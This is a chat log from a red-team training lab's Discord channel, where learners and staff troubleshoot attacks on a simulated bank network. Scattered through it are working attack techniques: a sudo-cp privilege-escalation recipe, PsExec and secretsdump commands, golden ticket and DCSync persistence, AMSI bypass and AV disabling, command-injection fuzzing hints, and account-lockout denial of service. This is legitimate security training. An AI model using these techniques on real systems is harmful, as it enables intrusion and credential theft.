#red-team-capstone-challenge
@trim beacon I've got a bit of a technical issue with the last few objectives that happened after a reset in the middle of a transaction. Can I DM you, please?
and yeah, the CMS dying on the web server has blocked shadow from trying that path so far
Yeah, @rocky python gave me a fix for it on stream which will be implemented before B2B. October does not respect its config when you disable account lockout. However, by now you should know what my favourite password is and it should not be too hard.
Did you reset your SWIFT progress and start again from flag 17?
It says I have an active check, so I try to remove the verification attempt with 'Z', then I get an invalid data error message. If I try to re-check 17 I get "Invalid data, please try again"
Expecting value: line 1 column 1 (char 0)
uh oh
Let me do a force reset, two seconds
also sneaky no-hints option for non-business users
There was no active attempt on your account. However I've removed flag 17 for you, so you can try to just continue from there
For my own check, just which subnet are you in?
119
Basically I was in the middle of trying last night, then the network got reset. When I got back to where I was just now, it thought I had an active SWIFT check going
Quickly check if you can do flag 17 now? Just want to see if it is fully flushed
On it
So... I have tried going from ROOTDC to BANKDC using psexec: cp PsExec64.exe \\bankdc.bank.thereserve.loc\C$\windows\temp\ Error message. Not gonna lie, it starts getting discouraging
Why are you trying to copy psexec to BANKDC? Just use PSexec on ROOTDC?
C:\Windows\system32>net user chris27
User name chris27
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2023/06/01 16:28:19
Password expires 2023/07/13 16:28:19
Password changeable 2023/06/02 16:28:19
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Remote Desktop Users
Global Group memberships *Enterprise Admins *Domain Admins
*Domain Users
The command completed successfully.
I'm not very smart. .\PsExec64.exe \\bankdc.bank.thereserve.loc -s cmd.exe?
hi, why can't I remote into the root DC? I've set up an account but no luck, it says I am not able to remote desktop. Any help, please?
Do you have a connection from your machine? More precisely, I mean that e.g. from the VPN server (as proxy) you might not be able to connect to ROOTDC or BANK.
@trim beacon ok the verification for 17 worked - (sorry to whoever is fighting with me over RDP :p)
make your own accounts... unless that is not really possible with the swift transfers come to think of it
ah multi step download and upload to get files onto the DC
Finally had enough free time to finish this network, it was a very fun learning experience (although frustrating at times!) @trim beacon thank you so much for this amazing network and giving us all this opportunity to give it a try before it is B2B exclusive!
Gave +1 Rep to @trim beacon
This is going to again be one of soap box speech messages that I type out once and pin.
We are currently seeing quite a number of users struggling with goal execution. We are also seeing some incredibly wild and noisy techniques being used here for goal execution. Users seem to be hell-bent on using RDP for this when more stealthy and covert techniques exist. On a real engagement, good luck with the blue team when you start randomly kicking actual employees out of their active sessions.
As mentioned before, the two hardest parts of this challenge are the start and the end. Goal execution is meant to be hard. It is meant to show you that there is an incredibly massive skill difference between "pwning the domain" and actually showing business impact on a red team engagement. This is why this challenge is not a CTF. It is not a boot-to-root challenge. It is meant to simulate what you might get out there in the real world.
With that being said, I'm more than happy for users to help each other here, but do understand that staff might not be providing more help for this portion. This is the point where you need to apply what you have learned to be able to execute on that goal.
A technical note: If the network resets in the middle of your progress between flag 17 - 20, you will have to start again from flag 17. Authenticate to e-citizen, press option 2, and then the option for reset flag progress.
What staff will help you with:
- Flag submissions for the goal execution phase if it gets bricked and does not reset
- Celebrations for finally getting to flag 20
Perfect, if flag 17 works and the network does not receive a reset, you should be good now all the way to the end
Awesome, thanks!
I think it is mentioned in one of the emails and also in the room wording, once you can see the SWIFT website, like actually browse to it, you should start the Verify SWIFT access flag, which is flag 17. By starting this flag, Trimento will create two SWIFT accounts for you
Glad you could get it done! Congrats!
Should work if your kerberos tickets are good
so by that logic you should probably not be kicked off rdp as you are using your own accounts
or well if you use your own accounts all the way basically
I think the problem is the deadline (just 4 days to go). Thus, people basically just kick in the front door to get the flags done. But I understand the point and still try to improve my path to SWIFT.
Windows has an RDP limit on all machines that don't have an RDP license installed. RDP licenses are incredibly expensive, so in real organisations these are only reserved for jump hosts. Normal hosts do not have RDP licenses, meaning the second a third user auths to a machine, it will kick someone out. Even worse, on Win10, RDP, even as a different account, based on configuration will put the laptop in a locked state, meaning the employee using the laptop would immediately notice. This is why we wait until the dead of night and use keylogging techniques to verify that a user has logged off for the day before we would even think of opening an RDP session on a real engagement
aaah makes sense... shadow has not messed with this enough to know all the nuance yet
Honestly at this point the challenge is getting swatted to be honest. However, if you use stealth techniques, even if they kick the front door open, it will not affect your journey. For example, if you were to use a combination of SSH and WMI, you can do this entire challenge without opening RDP once
wmi as in evil winrm????
because shadow had trouble figuring out how to create the files with the right encoding for the flags on there
This is interesting. ||So far, I got to ROOTDC without RDP (and got the ROOT\administrator hash) but I think at this point one needs a new proxy. My hope was, that I could work my way to BANKDC by DC sync'ing and pass-the-hash (from CORPDC proxy). Only think I doubt that I can manage the SWIFT transaction without RDP||
I avoided some of the RDP inception, but I don't know how one would complete the goal itself without it...
will we get to see some writeups before the network transitions to b2b?
Can I interest you in my religion called reverse dynamic SSH proxies?
Which might I add, is covered incredibly well by our very own @tall sorrel in his network: https://tryhackme.com/room/lateralmovementandpivoting - Which is part of the Red Team learning pathway
Trust me, 100% possible without opening a single RDP window
You could use PowerShell
echo "string" | Set-Content file.txt
The top three reports will be converted into writeup blog posts that will be published on our website
oh I'm sure, it's just that I personally don't know how
Either use command prompt instead of powershell or use what @serene sedge sent
I will give it a try. I was honestly surprised to see that ssh is available on Windows
ah thanks @serene sedge
Gave +1 Rep to @serene sedge
Welcome to the modern age. Now comes standard with Windows Servers
No clue why Windows thought it would be a good idea though
well shadow is probably gonna complete it using the stupid path of using rdp
because not feeling up to figuring out all the stuff needed to do it rdp less
Go for it! Good luck in the RDP force logout arena!
thanks gonna keep trying
so far there seems to have only been a single other user on this subnet that has grabbed flags from the corpdc
anyone had issues when authenticating to the e-citizen? seems my password doesn't work anymore
Windows does Windows.
Complete! Thanks @trim beacon for an awesome experience
Gave +1 Rep to @trim beacon
not problem authenticating but it was dead slow yesterday for shadow
it took over 3 mins to get logged in with the creds
it's like that for like 2hours now
Congrats! ๐
and rootdc pwned enough to get the flags
Make sure to do some form of persistence so you don't have to follow that exploit path again. Simplest would be to DC Sync the root domain. That way even if the network resets you can jump directly back into that position
??? goobly gook, shadow not understand most of that message ???
Have you dumped the credentials from CORPDC using something like mimikatz or secretsdump?
yeah
first secretsdump... used mimikatz to do a golden ticket for access to files and folders on rootdc
So now even if the network resets, you still have the NTLM hash for the Administrator@corp.thereserve.loc account right?
used evil winrm to get into corpdc and add a new domain admin user
yuups
assuming it does not change
which shadow dunno if it would but hope it does not ¯\_(ツ)_/¯
Okay, now you have gotten access to the root domain, thereserve.loc. Why not dump credentials from this domain so you don't have to do the golden ticket attack again?
If you dump the hash for Administrator@thereserve.loc, you will never have to do these steps again, can directly start there next time the network resets
ah
This is called persistence techniques. Meaning even if the blue team kicks you out (or the network resets) you have another way in
dunno how to do that considering shadow's way of access to root dc is using the golden ticket and powershell, but probably explained in Tyler R's VOD hopefully
considering he also had to deal with network resets
Your golden ticket is on CORPDC, right? Just run mimikatz in the window where you have created the golden ticket and tell it to dump credentials from thereserve.loc instead of corp.thereserve.loc
yuups golden ticket on corpdc .... time to look up mimikatz syntax
;-; why is it so hard to find stuff sometimes
almost feeling like asking for the mimikatz command here because shadow is so bad with mimikatz
meep, it's time to keep watching Tyler to see him do it
Check the AD persistence network room. Check persistence through credentials. Syntax is given there
thanks am03bam
thought it was in one of those network rooms but did not know which
hmm errors
Why cant I join the network? It just redirects me to room page that says you need 7 day streak, but I am a subscriber...
You still need the streak nonetheless
alright thanks for the info
a 7 day streak and sub is required
I'm about to get my 90 day streak yeeee haw
oh boy..... I finally made it! That was a thing! many many many thanks to @trim beacon That was a really great challenge! So wide, so wild! so many many ways to explore! many thanks to @trim beacon, for this challenge and his experience sharing. This is really a thing
Gave +1 Rep to @trim beacon
I hate to sound dumb but how do you give rep on discord. I'm older than dirt and don't know my way around social media
@quaint knot second part of stream number 7 seems to be missing with critical info on how you got access into rootdc... is the footage lost or do you have it saved???
someone pings you or quotes you with a message that includes the word thanks or thank you or ty or +rep
Gave +1 Rep to @thin dome
not really as some critical data seems to be lost from the guide shadow used
It's not lost, just had to figure it out by myself because it's not where you are looking
lost because the video by tyler is missing a huge chunk not lost that it is impossible to do
It's not on Tyler's vid. The part you are looking for
*?????
now you are confusing shadow
oooh you did not need help but offered help
with the golden ticket you can do everything. upload implants/dll, start/stop/create services etc.
well does not look like it ¯\_(ツ)_/¯
I DMd you
yeah just checked it hornruna
Guys, am I the only one experiencing issues to connect?
Feels like it worked a couple of minutes and now the servers are not responding
for example even the vpn login page does not give me any feedback on submit anymore
- vote reset
so sad I'll not make it until end of availability as it looks like :\
+rep @thin dome
Gave +1 Rep to @thin dome
and there we go... the first time the network reset on shadow causing them to get kicked out
meeping moops
Does it refer to my issue not getting feedback from servers? like vpn one hanging in submit?
1st time only? consider yourself very fortunate!
the last nights have already been too short. I'll take a nap.
When will the time end to be able to finish the capstone challenge?
hopefully another 12h
played subnet roulette a lot to find the few working and not to competitive subnets
Says it's 3 days and 13 hours right now
Try another subnet, press leave the room and then look it up again and join again. Find one that works
And, after a reset, it takes a little to get back up and running. I had that issue once but I waited and it started working again
I didn't sleep hardly at all lol. I was so obsessed with getting it cause I had already started it. Felt like I bit off more than I could chew but once I start something I like to finish. It really was an eye opener for me and helped understand things better.
yeah true
shadow just knows there are limits to their attention and prowess in hacking if they keep going for too long
well could be because shadow did not stay too long and just did step by step quickly to get some new flags quickly
DONE. great challenge @trim beacon !
nice good job mousse
Thank you
Gave +1 Rep to @cerulean wraith
you beat shadow too
Thanks for the hint here, I got in ๐
Gave +1 Rep to @trim beacon
I still can't get the rep thing figured out. I'm a fuckin loser
Now Ive been stuck on this for 30 minutes
when you reply to someone like this and your message contains the words "thank you" or "thanks" or "ty", or tagging then with "+rep" is how it works
Thanks. I'll try it but doesn't mean I'll get it. Sometimes I overthink things and end up in the weeds, hence why it took so long to do the challenge
Gave +1 Rep to @slender verge
Looks Like I just did it through robocop
there you go!
it is limited to once every 5 mins
i.e you can't give out thanks to multiple people unless you wait 5 mins
so yeah timeout
thanks @cerulean wraith
yeah. didnt work
guess ill get back on scylla and blackbird.py. trying to get an old friends phone number. Its fun to play around with OSINT tools
Finally got persistence on ROOTDC. I used my firewall hole-punching and portproxy trick to point the first DC to the ROOTDC. I had to combine it with an AMSI bypass + Disable AV + Add User
Let's see where that goes
Good job
Do you want me to give a example as a tip?
got to last flag and network reset. is there a way to get back to where I was or do I have to do it all again?
you have to get flags 17-20 in one go so you'd have to reset your progress on that
No
The last 20 flags are all on bank.Corp
My bad
The last 4 flags are all on bank.corp
I don't know where you are so I don't know what you mean. Once you get to bank.Corp you got access to flags 9-20
Like @slender verge said , for the last 4 flags , you gotta have a one shot cause if it gets reset then you gotta start over on the progress for the last 4 flags
Damn. Network is about to reset :(. I'm gonna work on my classes
At this point you should have enough information to be back at BANKDC in no time
nvm, silly me. I was trying to ping under proxychains
Still here if someone needs some help
Congrats on completing it!
Congrats on completing it!
Thank you! That was awesome
Gave +1 Rep to @trim beacon
I think it depends on the pivoting method. Metasploit has been working fine for me so far, but on the root and bank domain it is getting more unstable by the second (for me), so I changed it to chisel. It's a bit slower but much more stable, and everything from burp to evil-winrm has been working fine for me
also sorry for the late response
I just can't figure out how to use proxychains correctly.. it has always worked for me but now just doesn't:
i breached one of the 'outer' hosts and have ssh access to it as root, so i ssh -D 9050 root@hostname
then i would update my /etc/proxychains.conf with socks4 127.0.0.1 9050
and do proxychains nmap target -Pn etc.
but it seems like it doesn't use proxychains at all, since i don't have that line where proxychains shows me the forwarding through the tunnel [proxychains] Strict chain ... 127.0.0.1:90590 ... target:port ... Ok
i also don't get an error from proxychains, it just seems like traffic is routed through my "own" routes.
do I have to remove the route to 10.200.X.0/24 from my routing table to force traffic through proxychains? I thought this would be enforced with strict_chain in proxychains.conf already?
tested on the THM AttackBox with proxychains 3.1
I 100% can't get the proxychains on both THM machines to work for me, so I would recommend that you use your own machine. I always use proxychains4 with the quiet tag so no idea about the verbose thing. In the config file you should use socks5 not 4, and comment out strict_chain + use dynamic_chain (the last one I don't think matters)
alright, will test that, thanks a lot!
Gave +1 Rep to @dreamy comet
Thank you, no idea why cmd and notepad not working
Gave +1 Rep to @dull kestrel
If using evil winrm it defaults to Powershell
Use the -sT flag. -Pn might be lying to you
from this line [proxychains] Strict chain ... 127.0.0.1:90590 ... target:port ... Ok It seems you have a typo? It should be 127.0.0.1:9050. And I personally use the socks5. I didn't use the -Pn default nmap works fine.
thanks @trim beacon and @lucid bay, as @dreamy comet pointed out the problem are the THM boxes (AttackBox as well as Kali). proxychains just doesn't work correctly on those. Used my own one and bäm, works as intended
Gave +1 Rep to @trim beacon
y u no give Baturu thx?!?!
Cheers mate, glad you sorted it out
I'll do it! Thanks Baturu for being helpful
Gave +1 Rep to @lucid bay
Bot only counts rep once per message
hi @hidden galleon could i dm you or any staff? the e-Citizen portal seem to be broken on flag 19 for me
resetting 121 now, really? just golden ticketed my way to dc...
i mean if you do it on linux you can keep using the ticket even after a reset
yep sure but the initial access has to be done again, which is ok tho, i need a break anyway
If a network reset happened between you getting flags 17 - 20, you will have to reset your SWIFT progress (Authenticate to e-citizen, press option 2, then reset SWIFT progress). Then start again from flag 17
You have to get these flags in a single go
so thats why i CANT GET IN
so that apply to the Invalid data, please try again Expecting value: line 1 column 1 (char 0) error?
Most likely yes
so after the reset do i need to get all of the flag from 1 to 19? or will i start at the 17 flag?
also option 3 Reset SWIFT progress right? my brain is fried and I really don't want to re-do 19 flags
@trim beacon
Just from flag 17
yea same error
That is fine, it does a full flush. So now try to get flag 17
besides the 10x "Permanently added", everything seems to be working fine, and in the get flag part of this it still shows true for flag 17 and 18, so I just assumed the reset didn't work because of the error
am on flag 18 again and am not receiving the Transaction in my capturer access account
Give it a go. It if gives an issue still, I'll do a full reset from my side
Did you refresh the page? If e-citizen says it has been created, it will be there
Best to use an incognito browser to flush all cookies
ok thanks its working now
I'm quite confident the hashes don't change, yet before I was able to use both psexec and evil-winrm to log into corpdc and now neither of those are working
someone might have changed the hashes?
also, keep in mind if the password expired you can't use the hash anymore :/
huh, does the password expire on this network
thank you, you were right, hash is different now
Gave +1 Rep to @normal spire
yeah some of the machines have expired Administrator hashes
you can check with net user <user> under password expiry
The AD Administrator hash is one that cannot expire, even if it shows an expiry time. This account is used to recover AD when all else fails, thus this account bypassed expiry rules
sigh now the meeping vpn host is lagging again
when passing the hash with evil-winrm is it the nt part or the lm part or the whole ntlm???
in that case someone changed the password?
darn unstable internet connections is horrible during this
More than likely. But there are t0 accounts as well you can use to at least get you back to CORPDC. Would be very unlikely that someone changed all passwords for all accounts
Should be the nt part IIRC
thanks... that should probably mean shadow could get a evil-winrm shell on rootdc then
Gave +1 Rep to @trim beacon
ah sorry i meant more of the wrk and server hosts
careful because would need another pivot to access rootdc from your attackbox unless you're attacking from corpdc
unless it was just being dumb or something
Yeah those def can expire!
they expired in like march haha
Yeah I think that is when they were migrated to AD, which means no longer in use
really??? think shadows pivot point has access to rootdc but not 100% sure
yo @trim beacon different issue now, after i login to the destination account and transfer some funds to the source account i think i should get a pin in my mailbox but i didn't (this is the second time i have reset and try this)
Finally completed the challenge. Been mad at it since it went live, got to the last flag last night, the network reset, done it today in less than a few hours. I've learned why note taking is so important. I've learnt a lot in a short time, great room, and many thanks to the people that don't know they helped me out and to the people that do, thanks a bunch. happy cracking
iirc only corpdc can access rootdc
okay then.... guess that won't work as easily for shadow then
i just psexec'd from corpdc
also internet keeps cutting out and back in all the time right now.... 
but like from corpdc not from my attack box
can't keep hacking if internet goes poof every 1-5 mins
Your pin is sent in the verification email for flag 17
same pin? but that one give me an network error when used?
That pin should be active, but if not give me your subnet and I'll pull the pin for you
Congrats on completing it!
sure my subnet is .103.
Give me two seconds
3777 is the one on record
Wait no, 6425
Read one of the dummy transactions
But why does your account have two transactions? I think you might have done something wrong for verification. There should only be one transaction, I can see two. One for 10 mil, one for $2
Try to verify the transaction and hopefully verification works, but there should only be one transaction
oh jesus christ i have to confirm the 10 mil one, my brain is completely dead so the instructions is confusing to say the least
Did you get it confirmed?
yes but still
i think this is because of the 2 transactions I made (also did flip the accounts, still same error)
Might want to read those boxes carefully, what are they asking for?
yeah i have brain damage
and shadow has massive fomo because their internet is being whacky and annoying right now
So while we are on the last days of the challenge being for subscribers, will share that I am sad that no one seems to have found the non-malicious way of getting root on VPN. (Will delete again when it goes B2B)
If you look at the sudo -l output, you actually have two things you can run as sudo without a passwd:
/home/ubuntu/openvpn-createuser.sh
/bin/cp
A quick ls -al /home/ubuntu/ will show you the openvpn-createuser.sh file.
So to privesc, you simply
cp /home/ubuntu/openvpn-createuser.sh /tmp/openvpn-createuser.sh
- Create a backup of the file so you can replace it when done
- Rewrite the file to simply run /bin/bash
sudo /bin/cp /tmp/openvpn-createuser.sh /home/ubuntu/openvpn-createuser.sh
sudo /home/ubuntu/openvpn-createuser.sh
And you are root. Once you neatly deploy your persistence, you just replace the openvpn-createuser.sh with the backup you stored and no harm done to the box.
What makes me sad is that doing it this way means you take into context why this misconfiguration took place. Essentially, in order for the web server to generate and transfer user VPN profiles, an admin gave those two permissions. If the admin just actually took the time to update the openvpn-createuser.sh file to already copy the VPN file, this privilege escalation vector would not be possible.
So while tools like GTFObins can help you privesc, sometimes just thinking about the context of the misconfiguration can help you not only understand what happened (which means you can provide better recommendations to the client), but also privesc in a much safer way.
And which machine is this on.
Literally said the machine name in the first sentence
I know.
I'm winding you up.
Honestly, all that went through my head was these damn users don't read nothin'. Good wind up
I knew it would,
It reminded me of our conversation where you said it's going slow to us savages who don't read, will
E-Citizen, that is.
Yep, and even then we still increased the speed of the text of e-citizen cause users got frustrated. Just can't win here! But overall overexceeded my expectations of the number of users who would complete the challenge. Currently standing at 117
Luv it! must admit I only saw the /bin/cp only. Now I gotta go back to see it for myself! I still like your MSF tactic to root better, but see how this one is much more helpful (for the customer). But what advantage am I missing being root on VPN anyway? Other than PoC and trolling others? It doesn't seem to prevent you from getting to .52 with just ubuntu user as a base. Genuinely curious!
sooo just copying the contents of the .ssh/authorized_keys and then adding your own and adding back all the old ones is not a good exploit path for root on VPN????
It is the main fact that you don't have a really clean way of connecting to the host as www-data. Like you can't really drop an SSH key for example for this user. Other than that, no need to actually get root, which is why there is no flag for it
I'm not saying it is a bad path, all I'm saying is that it doesn't take into context why this misconfiguration happened
ah fair enoughs
yeah as a tester doing right by the customer is the ultimate goal!
shadow just liked having a stable ssh connection for root/sudo access as it seems safer
More than that, I can promise you as the client I would be getting reports telling me to remove /bin/cp from the list. Which sure, you are not wrong, but that doesn't help me as the client right? Cause I need it? But understanding why I made the misconfiguration, you can tell me to update the .sh script to already copy the file for me to the right location, thereby eliminating the need for the misconfigured privilege to exist
Did anyone get the ||GPO misuse from Server2 to CORP?||
Indeed yes, think I actually even got a writeup for this path which was super cool! They used an awesome tool for it!
neat... gonna have a field day with reading all the write ups if we get access to them
Nice! I was wondering about that one, glad that was found
Busy grading them now. The top three ones will be published as blog posts
It's an exciting weekend for THM.
Hopefully just an exciting Friday evening, I got other stuff to worry about this weekend. Have about three writeups left to QA
when this challenge expires?
on monday
monday 23:59?
in 2 days and 17 hours
Thanks
first task of the network has a countdown timer that you can check
it does not state the time zone for when access expires though
12PM BST is correct!
thanks @hidden galleon
Gave +1 Rep to @hidden galleon
What's not working exactly?
Like which command are you running that doesn't work
For nmap you need the -sT flag
If that doesn't work I recommend giving as much detail as you can so we can help debug
okay i know what was problem
What was it?
Gave +1 Rep to @slender verge
You're welcome
would you even say that corvids are smarter than you???
Finally, Thank you @trim beacon for such an amazing challenge. Loved it!!
Gave +1 Rep to @trim beacon
nice a person that is not using rdp
Is anyone on the .119 network? everything was fine until 10 minutes ago and now it seems like nothing is reachable including web/vpn
Yes, I am having the same problem. All hosts are unreachable
You mean leave room and re-join?
yuup to get a new subnet to try and hack
it is like a roulette wheel spin and that is why shadow is calling it that
Thank you.
Gave +1 Rep to @cerulean wraith
Thank you @trim beacon it really was an incredible network!
Gave +1 Rep to @trim beacon
congrats, is that color 27? How did you get the green so dark XD
I tried hard to do it the no-RDP way, but I don't have the knowledge for that yet
is it fair to say if you brute force the admin password successfully with Burp on the October page and it won't log you in (page just flashes and redirects to logon page again) that the site is broken? I'm kinda getting used to all the brokenness but wonder how on earth this bank gets any business done??
I would guess so, you should be able to log in just fine
and the plot thickens.... must be a timeout (600 sec?) when too many login attempts
oh yeah, currently it times out after like 5 attempts and locks you out for 15 minutes
if you've got the password, set a timer and try to log in in 15 min
900 sec then- --so you're saying there's a chance?
I'm saying there's a chance
well this admin is going in my report for password policy violation - I hope I don't have to explain impact any further than a screenshot of me logging in
technically not a violation of the policy, it doesn't want at least one capital letter
touche! its a poor password policy -sorry admin
it really is
unless the admin setup the policy?? seeing how broken this bank is, anything is possible
Nothing like 600+ Red Teamers poking around it all at once... what could go wrong??
In their defense, I have seen in real assessments where the password check is only on the client-side. I could literally capture the password change request with BurpSuite and set the password to "t" and it has worked more times than you'd believe
oh wow! scary that's a real thing in 2023. also recommend along with just suspending the account for 15min, rate-limit the attack (time-out) so Turbo can't continue bruteforcing after the 5th attempt - that would make any attacker cry
15 min up and I'm in!
So another interesting thing you're experiencing, which can happen in the real world, is when an account is locked due to invalid login attempts, you can essentially DoS an account by setting a script that continually logs into it. There's not really a way around that -- you could do an IP Block but BurpSuite has an extension (developed by my company - Rhino Security Labs) - called IP Rotate which will rotate your IP through AWS gateways that are spun up so you can bypass IP Blocks.
That being said, for one assessment for a security company, I could DoS the account by locking the account which would be great if I was attacking the org. They would not be able to log into their SIEM software to prevent the attack, because I could set a script that continually attempts to log into the account, therefore locking them out of their security platform!
(Enforcing a CAPTCHA after 5 or so invalid login attempts is a really good security measure -- as long as the CAPTCHA is securely implemented. Once again, I've seen CAPTCHAs that show up, but literally aren't enforced. You can keep bruteforcing and just pretend the CAPTCHA isn't there!)
Congrats on completing it! Love the PowerShell sessions you got there! Pivots to the extreme!
Congrats on completing it!
Account lockout kicking your butt here
it had me for 15min, yes! lol
Glad you got it sorted!
just wanna say thanks a lot to @broken nest for helping me debug my ticket and also a big thanks to @trim beacon for making this awesome lab, I finally finished the damn thing and I have severe brain damage https://tryhackme.com/mr.tom/badges/redteamcapstone
Gave +1 Rep to @broken nest
Hello, after connecting to the VPN, I'm getting a 172.x.x.x network instead of 10.200.x.x... Can anyone advise what needs to be done
The "ovpn file way" is not stable at all. I fixed it eventually. But to root the DC, I need to do it all the other way.
To sum up, it's not worth it at all to fix it.
Just root the VPNServer and start from there. You won't lose any progress you made so far. It's faster and more stable
Thanks @lucid bay... let me see if it works
Gave +1 Rep to @lucid bay
Congrats for completing it!
Hi, I had the issue several times and used this help: #red-team-capstone-challenge message:
"Hello, yesterday I had issues connecting to the internal network so I did: sudo ip route add 10.200.116.21 dev tun0
sudo ip route add 10.200.116.22 dev tun0"
The network is broken?
@dire folio Hi there, is there anyone also facing connection issue?
Hi ya, I just started the room and have enumerated all the machines I can reach, but haven't got much interesting stuff
could anyone give me a hand?
I am having trouble getting a reverse shell, on 10.200.116.12 it shows connection failed trying to connect to 10.0.2.15, which I am not using. Any ideas would be much appreciated.
Timsu, have you been able to get access to any machine?
I was able to access initial machines and 10.200.117.21 yesterday
But after the reset, it turns into 172.x.x.21 instead and not able to access it anymore
I think it was supposed to close today and only be available to business users.
if you are using the vpn config files and it gives you 172 you will have to manually add the correct routes
nope it closes on the 5th
Oh yeah, I thought it was the 6th today
nah we're only on the 3rd
There's a countdown timer in the first task
I played with RGB codes a little bit.
The "G" in RGB is 161, change it to "100" and you will get this green.
A friend is doing this and I've heard nothing but complaints from them on people resetting the lab every half an hour. Like no kidding. They are having a good time on this but seriously?! Why are people resetting so often
I can see this being so frustrating
somehow shadow only got reset nuked once
but yeah that nuke came right when shadow was about to do the final major pivots so it hurt a lot
A lot of it is, "step is not working, time to reset" instead of proper debugging or trying another path
Hey everyone, seeking help. I'm stuck on the ROOTDC. I'm on a psexec shell. Can't run mimikatz since there is AV and couldn't create a new user.
Tell them to get on a different subnet, might help with some luck
Finally, got a new user with full privileges on ROOTDC. But the ROOTDC and BANKDC both have RDP closed. Is that right or a network issue?
PORT STATE SERVICE REASON
3389/tcp closed ms-wbt-server conn-refused
Must be a network issue, should be able to RDP onto them just fine
Thank you, wasted hours doing those
Gave +1 Rep to @slender verge
I'm having trouble authenticating on the vpn panel (10.200.x.12) with the email laura.wood@corp.thereserve.loc and password Password1@. Has anyone had this problem?
Anyone willing to give me a hint on why I can perform command injection with ping on the VPN server but I can't use wget or curl?
&& & ; | try fuzzing those chars before your injection command. And command injection leads to RCE, you won't need wget or curl
Maybe I'm wrong. The network restarted.
3389 seems open to the internal servers, like I can telnet inside the DC. But it won't open through the VPN, which is outside of the firewall
where are you trying to reach it from? vpn server?
Yeah, I initially tried to reach ROOTDC 3389 from the VPNServer
oh I understand now, that's not going to work, you have to be on CORPDC for that
from there you can get to both ROOTDC and BANKDC
true, thanks. I'm too lazy to do another pivot. I'll just use the CORPDC RDP session to do those though
unless somewhere blocked me
yeah, that should work just fine
Hi. I found a valid email and password but am unable to log in.
Maybe they log in elsewhere.
Is there one guy who patched the DCSync of CORPDC to stop other users getting in?
proxychains impacket-secretsdump corp.thereserve.loc/svcBackups:'q9xxxx'@$IP
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[proxychains] Strict chain ... 127.0.0.1:1085 ... 10.200.x.102:445 ... OK
[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[*] Cleaning up...
I hope they stop messing up with other players. It's very fast to get 4 votes already
Hey, can anyone help me? I am unable to RDP into wrk1
Yeah. I use these creds on another site. Yesterday they worked perfectly, now they're not working
YES, I am not able to get a shell back to corpdc
network reset crashed it all
/timeout:60000 fix
any help on connecting corpdc
i had a evil-winrm connection
but after network reset not able to connect
probably the password hash has changed
if you have an evil-winrm connection and can't RDP, try resetting the password to get in.
if you lost the evil-winrm connection, try doing exactly what you did to get the NTLM hash in the first place again.
If none of them worked, vote for a reset, leave the room, wait 1-2 minutes and rejoin another subnet.
I'm so stuck after getting PsExec shell on ROOTDC. Should I just stop working on ROOTDC? Just attack BANKDC directly from CORPDC?
Nothing works for ROOTDC, neither a DCSync attack for the admin hash nor creating a new AD domain user
Anyone mind quickly helping me to get an enterprise admin setup, got my golden ticket on rootdc
I have a misc::cmd Psexec shell after the golden ticket. But completely stuck there for a whole day.
Found a cheeky exploit. If still struggling dm me
@trim beacon I'll tell ya what. This is one damn good network
Whoever just booted me off corpdc on .119, WHY
@trim beacon new challenge:
RDP Fight on .119 for CORPDC
did you get to bank dc
Indeed, I'm making the SWIFT
mind telling me
[12:42:55:293] [4106:4111] [INFO][com.freerdp.core] - ERRINFO_DISCONNECTED_BY_OTHER_CONNECTION (0x00000005):Another user connected to the server, forcing the disconnection of the current connection.
Sure am happy to help when I finally get access restored.
you settled the fight
@trim beacon GG Well Played.
anyone got to bank dc after root
Change password for administrator with psexec from golden ticket attack.... net user Administrator newpassword then rdp with thereserve/Administrator and new password.
I'm so glad i spent all day and night Saturday for the network challenge and was alone for hours in the subnet. hehe
I think it is not working
I have tried the invoke smbexec way too
but it is showing wrong creds
I think I have extracted the wrong hash value for administrator
If you have a golden ticket there is another way.
What's one tool that is installed on ALL Active Directory GUI servers?
(By Microsoft ^)
rdp
I told you the way above
Not that one. It's under ADMINISTRATIVE Tools in the start menu
There are 6000 ways
@gleaming bough once I got onto rootdc with the golden ticket (shell with PsExec.exe)... changed the administrator password for ROOTDC, then RDP into ROOTDC with the new creds.. created a domain admin user for BankDC. RDP into BankDC.
Can I DM you?
Finally did it. Great network
Thank you for creating such a wonderful network
@trim beacon Thank you
Gave +1 Rep to @trim beacon
Thank you for the challenge @trim beacon. Already compromised the network several days ago, but the path to compromise the bank domain is unintended since it cannot be replicated after the network reset ^_^. However, today I know the path to the bank domain via the intended path after several trials and errors
Gave +1 Rep to @trim beacon
Wow its finally completed @trim beacon thanks for this tough challenge
Gave +1 Rep to @trim beacon
Really guys, I'm having a hard time enjoying this since I stopped working on the lab yesterday because the VPN server was not responding and now when I get back someone changed the configuration on the VPN server and the VPN file is not downloaded anymore and the OS injection can't be exploited...
vote for network reset
I only have 2 votes, now I need to wait 3 more hours to give 1 vote per hour
You'll need to state your subnet.
They're all different, and you might be asking 5 people to reset their network who don't need it.
And that won't benefit you.
.52 network
since tomorrow is the last day access for individual users, everyone is in a hurry to compromise the network, wish you all the best @drowsy osprey
Thanks for the motivation @iron forge
Gave +1 Rep to @iron forge
Glad you are liking it!
Lol, you could always just pivot so you don't have to fight for RDP control
Congrats on completing it!
Congrats on completing it!!
You can do it! Believe in you!
Congrats on completing it!
Thank you very much @trim beacon, I didn't think I would be able to because of time constraints, but then I got so close and had a good session today to finish it. Great network!
Gave +1 Rep to @trim beacon
Thanks for the nice feedback! Glad you could get it done in time!
Gave +1 Rep to @tall imp
I finally managed to get as far as here without any RDPing, but I still have no idea how I would access the website this way... does anyone have any tips?
Hosts have SSH right? Why don't you do a reverse dynamic SSH proxy? Open an SSH server on your kali, then from the host ssh -R 8081 kali@<your kali tun ip>. Then port 8081 will now be on your kali host ready for proxychaining
Thank you! I did ssh proxy my way there, what's one more
Gave +1 Rep to @trim beacon
Exactly! And this is a nice reverse one, so a bit of a change for once
Why would anyone delete /etc/passwd file?
I'm just getting trolled by someone...Network uptime 1 hour...
sudo: unknown uid 33: who are you?
